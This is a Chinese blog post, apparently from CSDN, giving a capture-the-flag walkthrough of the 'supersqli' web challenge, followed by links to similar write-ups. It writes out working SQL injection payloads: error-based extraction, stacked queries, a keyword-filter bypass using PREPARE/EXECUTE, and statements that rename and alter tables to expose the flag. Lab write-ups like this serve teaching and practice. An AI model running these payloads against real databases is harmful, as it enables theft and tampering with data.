【攻防世界】十四、supersqli

最新推荐文章于 2024-05-10 21:16:18 发布
最新推荐文章于 2024-05-10 21:16:18 发布
阅读量146 收藏 2
点赞数
分类专栏: # 攻防世界WEB 文章标签: 数据库 sql ctf SQL注入
只能看不能摸哟!
本文链接:https://blog.csdn.net/weixin_45677145/article/details/120183437
版权

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

步骤

先输入1'")提交之后发现报错:
在这里插入图片描述
根据报错信息我们可以发现是用单引号'来进行闭合的
接着使用1' --+发现被过滤:
在这里插入图片描述

然后使用注释1' #发现可以使用:
在这里插入图片描述
使用order by语句发现有两个字段,接下来再用联合查询1' and select 1,2 #发现被过滤了:
在这里插入图片描述
而且绕不过去,既然这样我们尝试一下报错注入:
payload:1' and extractvalue(1,concat('^',database(),'^'))#
在这里插入图片描述
成功拿到库名,但是拿到之后也没有其他方法继续拿数据,这里我们试一下堆叠注入是否可行:
payload:1';show databases;#
在这里插入图片描述
发现堆叠注入成功,爆出数据库名,那这就好办了
payload:1';use supersqli;show tables;#
在这里插入图片描述
成功得到表名,可以分别看一下两张表里都有什么:
payload:1';use supersqli;show columns from `1919810931114514`;#
在这里插入图片描述
payload:1';use supersqli;show columns from `words`;#
在这里插入图片描述
在表1919810931114514中发现flag,成功发现目标这时候就得考虑怎么拿到它,由于select函数被禁用,我们这时候只能想其他方法了

两种方法:

第一,使用concat函数进行SQL语句的拼接绕过关键字的检测,使用SET函数进行变量的赋值,使用PRERARE函数进行SQL语句的创建,EXECUTE函数执行SQL语句
payload:1';use supersqli;SET @sql=concat('s','elect `flag` from `1919810931114514`');PREPARE sql1 from @sql;EXECUTE sql1;#
在这里插入图片描述
成功拿到flag~

第二,发现以上禁用的关键字里没有禁用rename以及alter,而且根据两张表里返回的数据可以发现words表里有两个字段:一个数字一个字符串,而默认查找返回的数据也是返回一个数据一个字符串。
在这里插入图片描述
很明显,能跟words表对应上,所以可以推断出默认查询的表也就是sql语句的编写中表是words表,输入的内容会带入id字段中进行查找

既然这样,我们可以改变表的结构,使用rename将表1919810931114514的名字命名为words,将他的字段flag命名为id,这样就默认查的是我们想要查询的表了
payload:1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `flag` `id` varchar(100);#
之后再使用1' or 1=1#另条件为真,即可得到flag~
在这里插入图片描述

总结

我们要打开思路,善于使用不同的方法来进行sql注入

我是大肥鼠
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入过滤了#,--+怎么办
weixin_30673715的博客
11-26 1702
题目是NCTF2018的web题目 第一段是错误的思路,第二段是晚上有思考后发现的直接看第二段吧。 ① ?id=1'会直接出来报错提示。 猜测使用单引号保护id。 另外一打空格就提示you hacker,空格在尾部是不会提示的,猜测用了去除尾部的空格的函数trim()。 空格的过滤绕过 %20 %09 %0a %0b %0c %0d %a0 %00 /**/ () 挨个试就行,最好不...
攻防世界——supersqli
weixin_62281892的博客
09-18 1778
PHP preg_replace() 正则替换,与Javascript 正则替换不同,PHP preg_replace() 默认就是替换所有符号匹配条件的元素。到这里我们的表列名就已经修改完毕,此时还会输出修改完成的words列名,最后通过万能钥匙1' or '1'='1即可得到输出。由于注入框的查询是对列id的搜索,此时参考两个表的列名,需要将flag列名改为能够查找的id列(修改包括名称和数据类型)。上网冲浪了解了一波,好像是类似黑名单,这些词会被替换,那没办法了,我们就用堆叠注入。
攻防世界(CTF)~web-supersqli(详细解题思路)
最新发布
m0_75030189的博客
05-10 854
mysql数据库sql语句的默认结束符是以;结尾,在执行多条SQL语句时就要使用结束符隔开,那么在;结束一条sql语句后继续构造下一条语句,会一起执行。这就是堆叠注入的基本原理
攻防世界-supersqli
weixin_43960066的博客
03-27 385
由于没有对alter,rename做出过滤,将1919810931114514修改为words,将flag修改为id,同时将words修改为其他的,将id也修改为其他的。由于过滤了一些关键字,所以想要得到flag可采取预编译、修改flag的名字为id修改1919810931114514为words(即可在搜索框中直接输入即可)发现flag在数字表中,同时判断当前正在使用的就是supersqli这个数据库,输入框中输入1就是查询的word表。想要得到flag需要使用的语句为。使用堆叠注入,查看数据库。
攻防世界supersqli
qq_45955869的博客
05-27 226
提示:攻防世界supersqli
攻防世界 supersqli writeup
12-14
发现有注入,注入点为injiect=2’,接下来–dbs尝试查询数据库,只爆出supersqli,但无法爆出表。 回到题目 order by 判断只有两个字段(别人的writerup说–+被过滤,只能使用#,不知道为什么没有,最后发现是在查询...
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界running
11-15
攻防世界running杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127861757
攻防世界-web-supersqli
wuh2333的博客
06-07 915
我们看到,服务端默认的查询语句查询出两个字段,说明查询的是words表,我们将表1919810931114514的名字改成words并且将flag字段改为id字段不就行了吗?这里尝试按照基本思路进行验证,先确定注入点,然后通过union查询依次确认数据库名,表名,字段名,最终获取到我们想要的字段信息。博客里提到的一种预编译绕过的方式可以让我们绕过waf的限制使用select语句,处理起来较为复杂,这里就不详细说明了。使用 or 永真修改查询条件可以将所有信息查询出来,因此这里肯定是存在sql注入的。
攻防世界supersqli
金 帛的博客
03-08 7716
攻防世界WP
攻防世界】五 --- supersqli
qq_43168364的博客
12-23 401
题目 — supersqli 一、writeup 二、知识点
supersqli-攻防世界
szhangliwenya的博客
03-30 2017
因为 H 对应 ASCII 码值为 72,e 对应 ASCII 码值为 101,l 对应 ASCII 码值为 108,o 对应 ASCII 码值为 111。根据提交方式:POST注入,GET注入,HTTP HEAD注入。根据有无回显:联合注入,报错注入,布尔盲注,延时注入。1' and 1=1 #没报错判断为单引号字符注入。其他注入:堆叠注入,宽字节注入,二次注入等。1' order by 3#报错。
【愚公系列】2023年05月 攻防世界-Web(supersqli
热门推荐
时光隧道
01-24 3万+
SQL注入攻击是一种常见的网络攻击方式,攻击者通过在用户输入的数据中插入恶意代码,从而获取数据库中的敏感信息或者执行未授权的操作。为了防范SQL注入攻击,我们应该在应用程序中使用参数化查询这样的安全措施来防范这种攻击。同时,我们还应该加强数据过滤和输入验证,以确保用户输入的数据符合预期的格式和类型。
XCTF-攻防世界CTF平台-Web类——14、supersqli(SQL注入、关键词过滤)
Onlyone_1314的博客
11-27 1983
目录标题方法一、堆叠注入1、rename修改表名和alter change修改列名2、rename修改表名和alter add添加列名方法二、handler语句方法三、预编译 打开题目地址 之后搜索:1’ or 1=1# 成功返回了3条数据,说明存在SQL注入漏洞 之后先判断有几列数据,使用order by 1让返回的数据按照第一列排序: 1' or 1=1 order by 1 # 返回了正确的结果,并且按照第一列排序了,说明至少存在一列数据。 其实我们也可以直接从order by 2让返回的数据
攻防世界supersqli(堆叠注入)
2302_79800344的博客
04-09 752
进入题目环境,有输入框与注入参数,推测类型为SQL注入:测试--注入类型为数字型还是字符型,构造payload:?inject=1 or 1=2 并提交: 发现页面依然正常,说明注入类型为字符型,则继续检查闭合方式,首先尝试单引号闭合,构造payload: ?inject=1' --+证实了闭合方式为单引号,继续测试字段数目(order by / group by ),经测试,字段数目为2。接着开始注数据库名,表名等关键信息:首先尝试Union联合注入---构造payload: ?inject=1' uni
攻防世界supersqli
zara_anna的博客
07-27 174
假设注入类型为数字型,注入点为id,分别输入上面的语句,那么第一行测试语句会返回id为1的查询结果,而第二行语句由于条件and 1=2不成立,所以查询结果为空。如果注入类型为字符型,将上面语句拼接到sql中,由于id的值都不匹配,所以应该是都不返回任何结果,但是如果id本身是int类型,实际查询过程中是会返回结果的,这可能是因为对输入的字符进行了截断并转换了类型,造成1 and 1=2在字符类型中会返回id为1的查询结果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值